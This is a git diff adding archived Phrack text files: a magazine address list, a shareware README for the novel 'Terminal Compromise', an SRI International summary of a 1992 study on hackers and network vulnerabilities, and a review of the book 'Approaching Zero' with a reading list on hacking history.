+Piscataway, NJ 08855-1331
+800-678-IEEE for info
+
+The "I Hate Brenda" Newsletter
+c/o Ben Is Dead
+P.O. Box 3166
+Hollywood, CA 90028
+$2.00
+
+InfoSecurity News
+P.O. Box 3168
+Lowell, MA 01853-3168
+$40.00/Year
+
+International UFO Library Magazine
+11684 Vewntura Blvd. #708
+Studio City, CA 91604
+$15.00/Year
+
+Magical Blend
+1461 Valencia St. Dept. GA
+San Francisco, CA 94110
+$14.00/Year
+
+Midnight Engineering
+1700 Washington Ave.
+Rocky Ford, CO 81067-9900
+$19.95/Year
+
+Mobile Office
+Subscription Department
+21800 Oxnard St.  Suite 250
+Woodland Hills, CA 91367-9644
+$23.90/Year
+
+Mondo 2000
+P.O. Box 10171
+Berkeley, CA 94709
+$24.00/Year
+
+Monitoring Times
+P.O. Box 98
+140 Dog Branch Road
+Brasstown, NC 28902-0098
+$19.95/Year
+
+New Media
+P.O. Box 1771
+Riverton, NJ 08077-9771
+$48.00/Year
+
+The Nose
+1095 Market Street, #812
+San Francisco, CA 94103-9654
+$15.00/Year
+
+Nuts & Volts
+430 Princeland Court
+Corona, CA 91719-9938
+$17.00/Year
+
+Popular Communications
+76 North Broadway
+Hicksville, NY 11801-9962
+$19.95/Year
+
+Sassy
+P.O. Box 50093
+Boulder, CO 80321-0093
+$9.97/Year
+
+Security Insider Report
+11511 Pine St. North
+Seminole, FL 34642
+$99.00/Year
+
+SunExpert Magazine
+1330 Beacon St.
+Brookline, MA 02146-3202
+$60.00/Year
+
+Tech Connect
+12407 MoPac Expwy. N. #100-374
+Austin, TX 78758-2499
+$12.00/Year
+
+Telephone Engineer & Management
+Advanstar Communications, Inc.
+P.O. Box 6100
+Duluoth, MN 55806-9822
+$24.00/Year
+
+UFO
+1536 S. Robertson Blvd.
+Los Angeles, CA 90035
+$21.00/Year
+
+Wild Cartoon Kingdom
+9171 Wilshire Blvd., Suite 300
+Beverly Hills, CA 90210
+$3.95/Issue
+
+Wired
+P.O. Box 191826
+San Francisco, CA 94119-1826
+$20.00/Year
+
+*****************************************************************************
+
+                     !!!!POST EVERYWHERE!!!!
+
+      THE WORLD'S FIRST NOVEL-ON-THE-NET (tm) SHAREWARE!!!
+                       By Inter.Pact Press
+
+                      "TERMINAL COMPROMISE"
+                        by Winn Schwartau
+
+     A high tech thriller that comes from today's headlines!
+
+"The Tom Clancy of computer security."
+          Assoc. Prof. Dr. Karen Forcht, James Madison University
+
+"Terminal  Compromise" is a highly praised novel about the  inva-
+sion of the United States by computer terrorists.
+
+Since  it was first published in conventional print form,  (ISBN:
+0-962-87000-5)  it has sold extremely well world-wide,  but  then
+again,  it never hit the New York Times Bestseller  List  either.
+But that's OK, not many do.
+
+Recently,  someone we know very well came up with a  real  bright
+idea.   They suggested  that INTER.PACT Press take  the  unprece-
+dented,  and maybe slightly crazy, step to put "Terminal  Compro-
+mise" on the Global Network thus creating a new category for book
+publishers.   The  idea is to offer  "Terminal  Compromise,"  and
+perhaps  other titles at NOVEL-ON-THE-NET SHAREWARE(tm) rates  to
+millions  of people who just don't spend a lot of time  in  book-
+stores.   After  discussions with dozens of people -  maybe  even
+more than a hundred - we decided to do just that.   We know  that
+we're  taking a chance, but we've been convinced by  hackers  and
+phreakers and corporate types and government representatives that
+putting "Terminal Compromise" on the net would be a fabulous step
+forward  into  the Electronic Age, (Cyberspace if you  will)  and
+would encourage other publishers to take advantage of  electronic
+distribution.   (It's still in the bookstores, though.)
+
+To  the  best of our  knowledge,  no  semi-sorta-kinda-legitimate
+-publisher has ever put a complete pre-published 562 page book on
+the  network  as a form of Shareware.  So, I guess  we're  making
+news  as  well as providing a service to the  world's  electronic
+community.   The recommended NOVEL-ON-THE-NET SHAREWARE fees  are
+outlined later (this is how we stay in business), so please  read
+on.
+
+WE KEEP THE COPYRIGHTS!
+
+"Terminal  Compromise"  is  NOT  being  entered  into  the  public
+domain.   It  is  being  distributed  electronically  so  hundreds
+of thousands more  people  can enjoy it and  understand just where
+we are heading with  our  omnipresent  interconnectedness  and the
+potential dangers we face.  INTER.PACT Press  maintains  all copy-
+rights to "Terminal Compromise" and does not, either intentionally
+or  otherwise,  explicitly  or implicitly,  waive  any  rights  to
+this  piece  of  work or  recourses  deemed  appropriate.  (Damned
+lawyers.)
+
+(C) 1991, 1992, 1993, Inter.Pact Press
+
+
+
+                TERMINAL COMPROMISE - THE REVIEWS
+
+" . . . a must read . . ."
+          Digital News
+
+"Schwartau  knows  about  networks and security  and  creates  an
+interesting plot that will keep readers turning the pages."
+          Computer World
+
+"Terminal  Compromise  is  fast-paced  and  gripping.   Schwartau
+explains complex technology facilely and without condescension."
+          Government Computer News
+
+"An  incredibly fascinating tale of international intrigue . .  .
+action  .  . . characterization . . . deserves attention  .  .  .
+difficult to imagine a more comprehensive resource."
+          PC Laptop
+
+"Schwartau   .  . . has a definite flair for  intrigue  and  plot
+twists.   (He) makes it clear that the most important  assets  at
+risk are America's right to privacy and our democratic ideals."
+          Personal Identification News
+
+"I  am  all  too familiar with the  appalling  realities  in  Mr.
+Schwartau's book.  (A) potentially catastrophic situation."
+          Chris Goggans, Ex-Legion of Doom Member.
+
+"  . . .  chilling scenarios . . . ",  "For light summer  reading
+with  weighty implications . . . ",  " . . .  thought  provoking,
+sometimes chilling . . . "
+
+Remember, it's only fiction.  Or is it?
+
+
+
+                  TERMINAL COMPROMISE: SYNOPSIS
+
+"It's all about the information . . . the information."
+                         From "Sneakers"
+
+Taki Homosoto, silver haired Chairman of Japan's huge OSO  Indus-
+tries,  survived Hiroshima; his family didn't. Homosoto  promises
+revenge  against the United States before he dies.  His  passion-
+ate, almost obsessive hatred of everything American finally comes
+to a head when he acts upon his desires.
+
+With  unlimited resources, he comes up with the ultimate  way  to
+strike back at the enemy. Miles  Foster, a brilliant 33 year old
+mathematician   apparently isn't  exactly  fond of America either.
+The  National  Security  Agency wanted  his  skills, but his back-
+ground and "family" connections kept him from advancing within the
+intelligence  community.  His  insatiable - borderline psychotic-
+sex drive  balances  the intensity  of waging war against his own
+country to  the  highest bidder.
+
+Scott  Mason,  made  his fortune selling high tech  toys  to  the
+Pentagon.   Now as a New York City Times reporter,  Mason  under-
+stands  both  the good and the evil of technology  and  discovers
+pieces  of  the terrible plot which is designed  to  destroy  the
+economy of the United States.
+
+Tyrone  Duncan, a physically huge 50-ish black senior  FBI  agent
+who suffered through the Hoover Age indignities, befriends  Scott
+Mason.  Tyrone provides the inside government track and confusion
+from competing agencies to deal with the threats.  His altruistic
+and  somewhat pure innate view of the world finally makes him  do
+the right thing.
+
+As  Homosoto's  plan evolves, Arab zealots,  German  intelligence
+agents and a host of technical mercenaries find the weaknesses in
+our  techno-economic  infrastructure.   Victims  find  themselves
+under  attack by unseen adversaries; Wall Street suffers  debili-
+tating  blows; Ford and Chrysler endure massive shut downs.   The
+U.S. economy suffers a series of crushing blows.
+
+From  the White House to the Pentagon to the CIA to the  National
+Security Agency and FBI, a complex weaving of fascinating politi-
+cal characters find themselves enmeshed a battle of the New World
+Order.   Sex,  drugs, rock'n'roll: Tokyo,  Vienna,  Paris,  Iraq,
+Iran.  It's all here.
+
+Enjoy reading "Terminal Compromise."
+
+
+
+                     SHAREWARE - NOVEL FEES:
+
+We hope that you enjoy "Terminal Compromise" as much as  everyone
+else  has, and that you will send us a few shekels  according  to
+the following guidelines.
+
+The  NOVEL-ON-THE-NET SHAREWARE(tm)  fees for us as a  publishing
+company  are no different than the fees for software  application
+shareware publishers, and the intent is the same.  So please, let
+us continue this form of publishing in the future.
+
+
+NOVEL-ON-THE-NET SHAREWARE Fees For The People:
+
+The suggested donation for individuals is $7.  If you hate Termi-
+nal Compromise after reading it, then only send $6.50.  If you're
+really, really broke, then tell a hundred other people how  great
+it was, send us a rave review and post it where you think  others
+will enjoy reading it, too.  If you're only a little broke,  send
+a few dollars.  After all, this is how we stay in business.  With
+each  registration, we will also send a FREE! issue of  "Security
+Insider Report," a monthly security newsletter also published  by
+Inter.Pact Press.
+
+
+NOVEL-ON-THE-NET SHAREWARE Fees For Businesses:
+
+We  hope  that  you put "Terminal Compromise"  on  your  internal
+networks so that your employees will have the chance to enjoy  it
+as well.  It's a great way to increase security awareness amongst
+this  country's 50,000,000 rank and file computer  users.   Plus,
+it's a hell of a good read.
+
+One  company  plans  on  releasing  a  chapter  every  few   days
+throughout its E-Mail system as a combination of security  aware-
+ness  and employee 'perc'.  Try it; it works and  your  employees
+will  appreciate it.  Why?  Because they'll all talk about  it  -
+bringing security awareness to the forefront of discussion.
+
+FEES
+
+Distribution for up to 100 people on a single network:  $   500
+     (Includes 1 Year subscription to "Security Insider Report.")
+
+Distribution for up to 1000 people on a single network: $  3000
+     (Includes  10  1  Year subscriptions  to  "Security  Insider
+     Report.")
+
+Distribution for up to 2500 people on a single network: $  6250
+     (Includes  1  Year  electronic  Corporate  site  license  to
+     "Security Insider Report.")
+
+Distribution for up to 5000 people on a single network: $  10000
+     (Includes  1  Year  electronic  Corporate  site  license  to
+     "Security Insider Report.")
+
+Distribution for up to 10000 people on a single network: $ 15000
+     (Includes  1  Year  electronic  Corporate  site  license  to
+     "Security Insider Report.")
+
+Distribution for up to 25000 people on a single network: $ 25000
+     (Includes  1  Year  electronic  Corporate  site  license  to
+     "Security Insider Report.")
+
+Distribution for more than that - Please call and we'll figure it
+out.   Would  you like us to coordinate  a  special  distribution
+program  for you?  Would you like in Postscript or  other  visual
+formats?  Give us a call and we'll see what we can do.
+
+                       * * * * * * * * * *
+     Please  DO NOT UPLOAD AND DISTRIBUTE  "Terminal  Compromise"
+     into  your networks unless you intend on paying  the  recom-
+     mended fees.
+
+                       * * * * * * * * * *
+
+
+NOVEL-ON-THE-NET SHAREWARE Fees for Universities:  FREE!
+
+"Terminal Compromise" has been used by many schools and universi-
+ties  as a teaching supplement.  Recognized Educational  institu-
+tions  are entitled to use "Terminal Compromise" at NO  COST,  as
+long  as you register with us that you are doing so. Please  pro-
+vide: School name, address, etc., the course, the instructor, and
+the  reason for using it.  Also, we'd like to hear from  you  and
+tell us how it went. Thanks.
+
+
+SHAREWARE-NOVEL Fees for Local, State and Federal Governments.
+
+     You have the money.  :-)  Please send some back by following
+     the same fee guidelines as those for businesses.
+
+     Government  employees:  You are The People - same  fees  are
+     appreciated.
+
+                       * * * * * * * * * *
+
+     Agencies: Do not upload and distribute "Terminal Compromise"
+     unless you plan on paying the fees.
+
+                      * * * * * * * * * * *
+
+
+NOVEL-ON-THE-NET SHAREWARE Fees for the International Community
+     Make payments in $US, please.
+
+GETTING TERMINAL COMPROMISE:
+
+     You  can get your copy of Terminal Compromise from a lot  of
+sites; if you don't see it, just ask around.  Currently the novel is
+archived at the following sites:
+
+                  ftp.netsys.com
+                  /pub/novel
+
+                  wuarchive.wustl.edu
+                  /doc/misc
+
+                  soda.berkeley.edu
+                  /pub/novel
+
+It  consists of either 2 or 5 files, depending upon how  you  re-
+ceive it. (Details at end of this file.)
+
+Feel  free to post all five files of "Terminal  Compromise"  any-
+where  on the net or on public or private BBS's as long  as  this
+file accompanies it as well.
+
+
+Please forward all NOVEL-ON-THE-NET SHAREWARE fees to:
+
+     INTER.PACT PRESS
+     11511 Pine St. N.
+     Seminole, FL., 34642
+
+Communications:
+
+     Phn: 813-393-6600
+     Fax: 813-393-6361
+     E-Mail: p00506@psi.com
+             wschwartau@mcimail.com
+
+We will accept checks, money orders, and cash if you must, and we
+mean  if you must.  It's not the smartest thing in the  world  to
+send  cash through the mail.  We are NOT equipped at  this  point
+for credit cards.
+
+Remember, "Terminal Compromise is copyrighted, and we will vigor-
+ously pursue violations of that copyright.  (Lawyers made us  say
+it again.)
+
+If you ABSOLUTELY LOVE "Terminal Compromise," or find that  after
+50 pages of On-Screen reading, you may want a hard copy for  your
+bookshelf.   It  is  available  from  bookstores  nationwide  for
+$19.95,  or from Inter.Pact directly for $19.95 + $3.50  shipping
+and handling.  If you first paid the $ 7 NOVEL-ON-THE-NET  SHARE-
+WARE  fee, send in proof and we'll deduct $ 7 from the  price  of
+the hard copy edition.
+
+ISBN: 0-962-87000-5
+
+Enjoy "Terminal Compromise" and help us make it an easy  decision
+to put more books on the Global Network.
+
+Thank you in advance for your attention and your consideration.
+
+
+
+The Publishers,
+INTER.PACT Press
+
+
+
+               READING "TERMINAL COMPROMISE"
+
+"Terminal Compromise" will come to you in one of two ways:
+
+1)  Original Distribution Format From Inter.Pact  Press  contains
+only two -2- files.
+
+          TC_READ.ME     13,927 Bytes
+
+That is this file you  are now reading and  gives an overview of
+"Terminal  Compromise" and how NOVEL-ON-THE-NET Shareware works.
+
+          TERMCOMP.ZIP   605,821 Bytes
+
+This is the total content of "Terminal Compromise".  Run  PKUNZIP
+to expand the file into four -4- readable ASCII files.
+
+2)   Some locations may choose to post "Terminal  Compromise"  in
+readable  ASCII form.  There will then be four files in  addition
+to the TC_READ.ME file.
+
+          TERMCOMP.1     250,213 Bytes
+
+contains the Introduction and Chapters 1 through 5.
+
+          TERMCOMP.2     337,257 Bytes
+
+contains Chapters 6 through 14.
+
+          TERMCOMP.3     363,615 Bytes
+
+contains Chapters 15 through 21.
+
+          TERMCOMP.4     388,515 Bytes
+
+contains Chapters 22 through 30 and the Epilogue.
+
+
+     Enjoy "Terminal Compromise!" and pass it on to whomever  you
+     think would enjoy it, too!
+
+     Thank You!
+
+****************************************************************************
+
+THE STATE OF SECURITY IN CYBERSPACE
+
+SRI International conducted a worldwide study in 1992 of a broad range of
+security issues in "cyberspace."  In brief, cyberspace is the full set of
+public and private communications networks in the United States and elsewhere,
+including telephone or public switched telephone networks (PSTNs), packet data
+networks (PDNs) of various kinds, pure computer networks, including the
+Internet, and wireless communications systems, such as the cellular telephone
+system.  We did not address security vulnerabilities associated with
+classified, secure communications networks used by and for governments.
+
+The study was conducted as part of our ongoing research into the
+vulnerabilities of various software components of cyberspace.  Our approach was
+to conduct research through field interviews with a broad range of experts,
+including people we characterize as "good hackers," about security issues and
+vulnerabilities of cyberspace and the activities of the international
+"malicious hacker" community.
+
+While the specific results of the study are proprietary to SRI, this brief
+report summarizes our general conclusions for the many individuals who kindly
+participated in our field interviews.  As we indicated during our field
+interviews, the original research for this project was not part of any other
+kind of investigation, and we have not revealed the identify of any of our
+respondents.
+
+The study aimed to understand "malicious hackers," that is, people who have and
+use the technical knowledge, capability, and motivation to gain unauthorized
+access, for various reasons, to systems in cyberspace.  It is important to
+understand that by no means all hackers are malicious nor does most hacking
+involve unauthorized access to cyberspace systems; indeed, only a small
+fraction of computer hacking involves such activities but gives hacking an
+otherwise undeserved bad reputation.  While we attempted to focus on technical
+(software) vulnerabilities, our interviews led us to look more at the broader
+motivations and different approaches to cracking into various networks and
+networked systems.
+
+MAIN CONCLUSIONS
+
+Our main conclusion is that social, organizational, and technological factors
+still combine in ways that make much of cyberspace relatively vulnerable to
+unauthorized access.  The degree of vulnerability varies from one type of
+communications system to another.  In general, the PSTN is the least vulnerable
+system, the PDNs are somewhat more vulnerable than the PSTN, the Internet is
+relatively insecure, and as is widely known, the cellular phone system is the
+most vulnerable of the four major areas we addressed.
+
+The main vulnerabilities in most communications networks involves procedural,
+administrative, and human weaknesses, rather than purely technical
+vulnerabilities of network management, control systems, and hardware, and
+software.  There are technical vulnerabilities--poor system design and specific
+security flaws in software--but they are mainly exploitable because of the
+above problems.
+
+Highlights of the study's conclusions include:
+
+o Malicious attacks on most networks and networked systems cannot be completely
+prevented, now or in the future.  More than enough information is publicly
+available to hackers and other technically-literate people to preclude attempts
+at prevention of intrusions.
+
+o It is possible individuals or groups could bring down individual systems or
+related groups of systems, on purpose or by accident.  However, security is
+generally improving as a result of dealing with past threats and challenges to
+system security.  For instance, responses to the most recent serious threat to
+the Internet, the so-called Internet Worm in 1989, included improved security
+at sites vulnerable to this sort of worm.
+
+o We found no evidence that the current generation of U.S. hackers is
+attempting to sabotage entire networks.  On the contrary, doing so is
+inconsistent with the stated ethics and values of the hacker community, which
+are to explore cyberspace as a purely intellectual exercise without malicious
+intent or behavior.  Some individuals who operate outside this informal ethical
+framework, however, can and do damage specific systems and occasionally use
+systems for personal gain or vindictive activities.
+
+o There is some evidence that the newest generations of hackers, may be more
+motivated by personal gain than the traditional ethic of sheer curiosity.  This
+development could mean that networks and networked systems could become more
+likely targets for attacks by hardened criminals  or governments' intelligence
+services or their contractors (i.e., employing malicious hackers).  This threat
+does not appear to be significant today but is a possible future scenario.
+
+o The four major areas of vulnerability uncovered in our research have little
+or nothing to do with specific software vulnerabilities per se.  They relate
+more to the ways in which hackers can gain critical information they need in
+order to exploit vulnerabilities that exist because of poor systems
+administration and maintenance, unpatched "holes" in networks and systems, and
+so on.
+- The susceptibility of employees of businesses, public organizations, schools,
+and other institutions to "social engineering" techniques
+- Lax physical and procedural controls
+- The widespread availability of non-proprietary and of sensitive and
+proprietary information on paper about networks and computer systems
+- The existence of "moles," employees of communications and computer firms and
+their suppliers who knowingly provide proprietary information to hackers.
+
+o The vulnerabilities caused by shortcomings in software-based access controls
+and in hardware-related issues constitute significantly lower levels of risk
+than do the four areas discussed above on more secure networks such as the PSTN
+and PDNs.  However, on the Internet and similar systems, software-based access
+controls (for instance, password systems) constitute significant problems
+because of often poor system maintenance and other procedural flaws.
+
+RECOMMENDATIONS
+
+Based on our research, we recommend the following:
+
+1. Protection of organizational information and communications assets should be
+improved.  Issues here range from those involving overall security systems to
+training employees and customers about maintenance of security on individual
+systems, handling and disposition of sensitive printed information, and dealing
+with "social engineering."
+
+2. Techniques used to protect physical assets should be improved.  For example,
+doors and gates should be locked properly and sensitive documents and equipment
+guarded appropriately.
+
+3. Organizations and their employees should be made aware of the existence and
+role of moles in facilitating and enabling hacker intrusions, and care taken in
+hiring and motivating employees with the mole problem in mind.
+
+4. Software- and hardware-based vulnerabilities should also be addressed as a
+matter of course in systems design, installation and maintenance.
+
+5. Organizations concerned with information and communications security should
+proactively promote educational programs for students and parents about
+appropriate computer and communications use, personal integrity and ethics, and
+legitimate career opportunities in the  information  industry, and reward
+exemplary skills, proficiency and achievements in programming and ethical
+hacking.
+
+6. Laws against malicious hacking should be fairly and justly enforced.
+
+SRI's believes that the results of this study will provide useful information
+to both the operators and users of cyberspace, including the hacker community.
+We are planning to continue our research in this area during 1993 within the
+same framework and conditions (i.e., anonymity of all parties and
+organizations) as we conducted the 1992 research.  We invite hackers and others
+who are interested in participating in this work through face-to-face,
+telephone or email interviews should contact one of the following members of
+the SRI project team:
+
+A. J. Bate
+SRI International
+Phone:  415 859 2206
+Fax:  415 859 3154
+Email:  aj_bate@qm.sri.com,
+             aj@sri.com
+
+Stuart Hauser
+SRI International
+Phone:  415 859 5755
+Fax:      415 859 3154
+Email:   stuart_hauser@qm.sri.com
+
+Tom Mandel
+SRI International
+Phone:  415 859 2365
+FAX:  415 859 7544
+Email:   mandel@unix.sri.com
+
+*****************************************************************************
\ No newline at end of file
diff --git a/phrack43/5.txt b/phrack43/5.txt
new file mode 100644
index 0000000..1385d95
--- /dev/null
+++ b/phrack43/5.txt
@@ -0,0 +1,929 @@
+                         ==Phrack Magazine==
+
+              Volume Four, Issue Forty-Two, File 5 of 27
+
+
+                           //   //  /\   //   ====
+                          //   //  //\\ //   ====
+                         ==== //  //  \\/   ====
+
+                     /\   //  // \\    //  /===   ====
+                    //\\ //  //   //  //   \=\   ====
+                   //  \\/    \\ //  //   ===/  ====
+
+                                (cont)
+
+******************************************************************************
+
+    `'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'
+    '`                                            '`
+    `'             Approaching Reality:           `'
+    '`             ~~~~~~~~~~~~~~~~~~~~           '`
+    `'  A review of the new book Approaching Zero `'
+    '`  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ '`
+    `'                by Aleph One                `'
+    '`                ~~~~~~~~~~~~                '`
+    `'                                            `'
+    '`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`
+
+     When I started to read this book, I expected to read one more of the
+series of books that claim to be the "definitive history of the computer
+underworld" and the "first book to define the technological subculture of
+phreaking, hacking, and virus writing".  After all what does a guy that
+writes for GQ, The Hollywood Reporter, Variety and Time know about the
+computer underground?  Well to my surprise the authors, Paul Mungo and
+Bryan Clough (a member of the Virus Strategy Group, which is coordinated by
+New Scotland Yard's Computer Crime Unit), did a pretty good job at presenting
+the facts as they are.  For the first time I heard a reporter and a
+computer crime expert give real figures at how much computer crime has
+really cost.  Other than a few minor technical errors and the fact that
+they fail to mention some people and groups (especially in the virus
+section), the book was enjoyable to read.
+
+    The book covers the history of the underground starting with its
+beginnings in the 60's, from phreaking to the adventures of Captain
+Crunch and the rest of the bunch to the not so long ago Operation Sundevil
+and the raids all over the country on members of the LOD, MOD and DPAC.
+It also goes through the events that led to the German hackers spy trials,
+and to the new generation of virus writers that are creating the new kind
+of living organisms that roam cyberspace.  They also discuss the gray
+scale that categorizes hackers, from the good hackers to the bad to the
+ones not that bad... those who are in it for profit and those who are
+in it to learn.  Hopefully all the readers of the book, hackers, security
+specialists, reporters and the general public will get a better
+understanding of what motivates hackers to do what they do by learning
+where they come from. To the hackers let them learn not to repeat their
+past errors.
+
+
+     I hope that the time of raids and sting operations has passed, but
+the late developments in the Washington 2600 meeting have pulled a shadow
+over my hopes.  Has no one learned?  Have the SS and FBI nothing better to
+do?  Just a few moths back someone pulled one of the greatest scams of all
+by setting up a fake ATM and stealing a few thousand dollars.  These are
+the kind of people the authorities should be after.  And to the hacker,
+don't sell yourself!  Remember this is a learning trip, once you start
+forgetting to learn and start making money out of it, it is just another
+job, an illegal one at that.
+
+     Approaching Zero was an exciting and interesting surprise.  It has
+given me the hint that maybe someone out there understands and I hope that
+everyone that reads it (and you must, you must read and learn all you can)
+will also understand.  I just leave you with these words:  Hacking comes
+from the heart - sometimes in the form of an obsession, sometimes in the
+form of a hobby - once that dies, there is nothing left to do.  No more
+traveling trough the nets!  No more exploring new systems!  You might as
+well turn the power off.
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+ What fallows is a list of books, papers and articles for those that
+want to know a little more of how the media portrays us, and a little more
+about the story of hacking in general.
+
+
+     Books:
+     ~~~~~~
+
+   - "Approaching Zero" by Paul Mungo & Bryan Clough. Random House
+   1992.
+
+   - "Beating the System" by Owen Bowcott & Sally Hamilton. London:
+    Bloomsbury, 1990.
+
+   - "Computer Viruses - A High-Tech Disease" by Ralf Burger. Grand
+    Rapids, MI: Abacus, 1988.
+
+   - "The Hackers' Handbook" by Hugo Cornwall. London: Century
+    Communications, 1985.
+
+   - "Computers Under Attack" by Peter Denning. Addison Wesley, 1990.
+
+   - "Profits of Deceit" by Patricia Franklin. London: William
+    Heinemann, 1990.
+
+   - "Cyberpunk" by Katie Hafner & John Markoff. London: Fourth Estate,
+    1991.
+
+   - "Out of the Inner Circle" by Bill Landreth (aka The Cracker).
+    Redmond, WA.: Tempus Books, 1985.
+
+   - "Sillicon Valley Fever" by Judith K. Larsen & Everett M. Rogers.
+    London: George Allen & Unwin, 1985.
+
+   - "Computer Viruses" by Ralph Roberts. Greensboro, NC: Compute! Books,
+    1988.
+
+   - "The Cuckoo's Egg" by Clifford Stoll. New York: Doubleday, 1989.
+
+   - "Spectacular Computer Crimes" by Buck BloomBecker. Dow Jones-Irwin,
+    1990.
+
+   - "The New Hacker's Dictionary" by Eric Raymond. MIT Press, 1983.
+
+   - "The Hacker Crackdown" by Bruce Sterling. Bantam Books, 1992.
+
+   - "The Little Black Book of Computer Viruses" by Mark Ludwig. American
+    Eagle Publications, 1991.
+
+   - "Artificial Life" by Steven Levy. Panthenon, 1992. (For those virus
+    writers out there, use your tallen to create life.)
+
+
+     Articles & Papers:
+     ~~~~~~~~~~~~~~~~~~
+
+   - "Crime and Puzzlement" by John Perry Barlow. Whole Earth Review,
+    Fall 1990: 44-57.
+
+   - "The Casino Virus - Gambling with Your Hard Disk" by Jim Bates.
+    Virus Bulletin, March 1991: 15-17.
+
+   - "The TP Viruses" by Vesselin Bontchev. Postings to Virus-L 1990.
+
+   - "In Defense of Hackers" by Craig Bromberg. The New York Times
+    Magazine, April 21, 1991.
+
+   - "Bulgaria - The Dark Country" by Bryan Clough. Virus Bulletin,
+    December 1990: 9-11.
+
+   - "Voice Mail Computer Abuse Prosecution: United States v. Doucette
+    a/k/a Kyrie" by William J. Cook. Safe Computing Proceedings of the
+    Fourth Annual Computer Virus & Security Conference, 1991, Organized
+    by National Computing Corporation.
+
+   - "Invasion of the Data Snatchers!" by Philip Elmer-De Witt. Time,
+    September 26, 1988: 63.
+
+   - "Data Exchange and How to Cope with This Problem: The Implication
+    of the German KGB Computer Espionage Affair" by Hans Gliss. Paper
+    presented at Securicom Italia, October 1989.
+
+   - "The Implications of the SPANet Hack." Computers Fraud & Security
+    Bulletin, Vol. 10, No. 2, 1987.
+
+   - "The Brain Virus: Fact and Fantasy" by Harold J. Highland. Computers
+    & Security, August 1988: 367-370.
+
+   - Computer Viruses - A Post Modern." Computer & Security, April 1988:
+    117-184.
+
+   - "Terminal Delinquents" by Jack Hitt & Paul Tough. Esquire, December
+    1990.
+
+   - "The Social Organization of the Computer Underground" by Gordon R.
+    Meyer. M.A. Thesis Submitted to the Graduate School, August 1989.
+
+   - "Satanic Viruses" by Paul Mungo. GQ, February 1991: 126-130.
+
+   - "Secrets of the Little Blue Box" by Ron Rosenbaum. Esquire, October
+    1971, Collected in Travels with Dr. Death. New York: Viking Penguin,
+    1991.
+
+   - "The Worm Program - Early Experience with a Distributed
+    Computations" by John F. Shoch. Communications of the ACM, Vol. 25,
+    No. 3, March 1982.
+
+   - "The Search for Den Zuk" by Fridrik Skulason. Virus Bulletin,
+    February 1991: 6-7.
+
+   - "Crisis and Aftermath" by Eugene H. Spafford. Communications of the
+    ACM. Vol. 32, No. 6, June 1989.
+
+   - "GURPS Labor Lost: The Cyberpunk Bust" by Bruce Sterling, Effector,
+    September 1991: 1.
+
+   - "Stalking the Wily Hacker" by Clifford Stoll. Communications of the
+    ACM. Vol. 31, No. 5, May 1988.
+
+   - "The Kinetics of Computer Virus Replication." by Peter S. Tippett.
+    FundationWare, March 1990.
+
+   - "The General and Logical Theory of Automata" by John L. von Neumann.
+    Hixon Symposium, September 1948.
+
+   - "Here Comes the Cyberpunk" by Eden Restored. Time, February 8, 1993:
+    58-65.
+
+   - "Surfing Off the Edge" by Richard Begar. Time, February 8, 1993: 62.
+
+   - "Can Hackers Be Sued for Damages Caused by Computer Viruses?" by
+    Pamela Samuelson. Communications of the ACM. Vol. 32, No. 6, June
+    1989.
+
+   - "Viruses and Criminal Law" by Michael Gemignani. Communications of
+    the ACM. Vol. 32, No. 6, June 1989.
+
+   - "Password Cracking: A Game of Wits" by Donn Seeley. Communications
+    of the ACM. Vol. 32, No. 6, June 1989.
+
+   - "The Cornell Commission: On Morris and the Worm" by Ted Eisenberg,
+    David Gries, Juris Artmanis, Don Holcomb, M. Stuart Lynn & Thomas
+    Santoro. Communications of the ACM. Vol. 32, No. 6, June 1989.
+
+   - "Desperately Seeking Cyberspace" by Paul Saffo. Personal Computing,
+    May 1989: 247-248.
+
+   - "Secrets of the Software Pirates" by Bylee Gomes. Esquire, January
+    1982: 58-64.
+
+   - "Trouble in Cyberspace" by Willard Uncapher. The Humanist,
+    September/October 1991: 5-14,34.
+
+   - "Is Computer Hacking a Crime?" Capture of a discussion held on the
+    WELL. Harper's Magazine, March 1990: 45-57.
+
+   - "The United States vs. Craig Neidorf" by Dorothy E. Denning.
+    Communications of the ACM, Vol. 34, No. 3, March 1991: 24-32.
+
+   - "Colleagues Debate Denning's Comments." Communications of the ACM.
+    Vol. 34, No. 3, March 1991: 33-41.
+
+   - "Denning's Rebutal" by Dorothy E. Denning. Communications of the
+    ACM. Vol. 34, No. 3, March 1991: 42-43.
+
+   - "Coming into the Country" by John P. Barlow. Communications of the
+    ACM. Vol. 34, No. 3, March 1991: 19-21.
+
+   - "Off the Hook" by Julian Dibbell. Village Voice, August 21, 1990: 8.
+
+   - "On Line and Out of Bounds" by Julian Dibbell. Village Voice, July
+    24, 1990:27-32.
+
+  - "Hi-Tech Mall Crawl" by Julian Dibbell. Village Voice. March 1990: 12
+
+  - "Samurai Hackers" by Lynda Edwards. Rolling Stone, September 19,
+   1991: 67-69.
+
+  - "Crackdown on hackers `may violate civil rights'" by Dan Charles.
+   New Scientist, July 21, 1990: 22.
+
+  - "United States v. Zod." The Economist, September 1, 1990: 23.
+
+  - "Drop the Phone." Time, January 9, 1989: 49.
+
+  - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific
+   American, May 1984: 14-21.
+
+  - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific
+   American, March 1985: 14-23.
+
+  - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific
+   American. March 1989: 110-113.
+
+  - "Computer Security: NAS Sounds the Alarm" by Eliot Marshall. Science,
+   Vol. 250: 1330.
+
+  - "Students Discover Computer Threat" by Gina Koda. Science, Vol. 215,
+   5 March, 1982: 1216-1217.
+
+  - "A nationwide Computer-Fraud Ring Is Broken Up." The New York Times
+   National, Sunday, April 19, 1992.
+
+  - "Hackers: Is a Cure Worse than the Disease?" by Mark Lewyn. Business
+   Week, December 4, 1989: 37-38.
+
+  - "Computer Hacking Goes to Trail" by William F. Allman. U.S. News &
+   World Report, January 22, 1990: 25.
+
+  - "Morris Code: by Katie Hafner. The New Republican, February 19, 1990:
+   15-16.
+
+  - "Hackers Intentions Key to Court Case" by David Lindley. Nature. Vol.
+   340, August 3, 1989: 329.
+
